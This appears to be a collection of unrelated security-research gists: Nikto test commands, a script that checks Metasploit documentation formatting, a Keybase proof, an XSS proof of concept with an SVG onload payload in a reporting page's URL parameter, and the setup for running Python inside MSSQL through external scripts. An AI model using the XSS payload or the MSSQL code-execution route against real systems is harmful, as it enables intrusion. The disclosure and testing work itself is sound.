- Add new tests
nano -L program/databases/udb_tests
- Test just the new tests
./nikto.pl -Userdbs tests -Plugins tests -Display V -host https://example.com
- Move the new tests to the db
cat udb_tests >> db_tests
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
for DOC in $(find metasploit-framework/documentation -type f -name '*.md'); do | |
quotes=$(grep -o \`\`\` $DOC | wc -l) | |
if [ "$(($quotes % 2))" != "0" ]; then | |
echo $DOC $quotes | |
fi | |
done |
I hereby claim:
- I am james-otten on github.
- I am jamesotten (https://keybase.io/jamesotten) on keybase.
- I have a public key ASAbhH3qh6bJTEWb6Q-lGcRQsS154onwIZdxXYktue8I9go
To claim this, I am signing this object:
James Otten 8/30/2018
All items tested in versions 11.1.468 and 12.0.3074.
- As a low privileged read only user, navigate to
/iwc/reports.iwc?repo_id=1&db_id=&filterDbId=<svg/onload=alert(/error_log/)>&type=&pm=P
- As a privileged user, go to
/iwc/logViewer.iwc
and view the contents of the iwc or error log. - XSS experienced.
MSSQL 2017 includes Microsoft Machine Learning Services, which allows for the execution of Python and R scripts within MSSQL via sp_execute_external_script
. This is an expansion of the functionality available in MSSQL 2016, which allowed for the execution of R scripts with SQL Server R Services. Examples of how to abuse this functionality with R scripts are available elsewhere.
To execute Python code:
Machine Learning Services (In-Database)
andPython
must have been selected during installation- External scripts must be enabled
EXEC sp_configure 'external scripts enabled', 1
RECONFIGURE WITH OVERRIDE
- Restart the database server
- The user must have
EXECUTE ANY EXTERNAL SCRIPT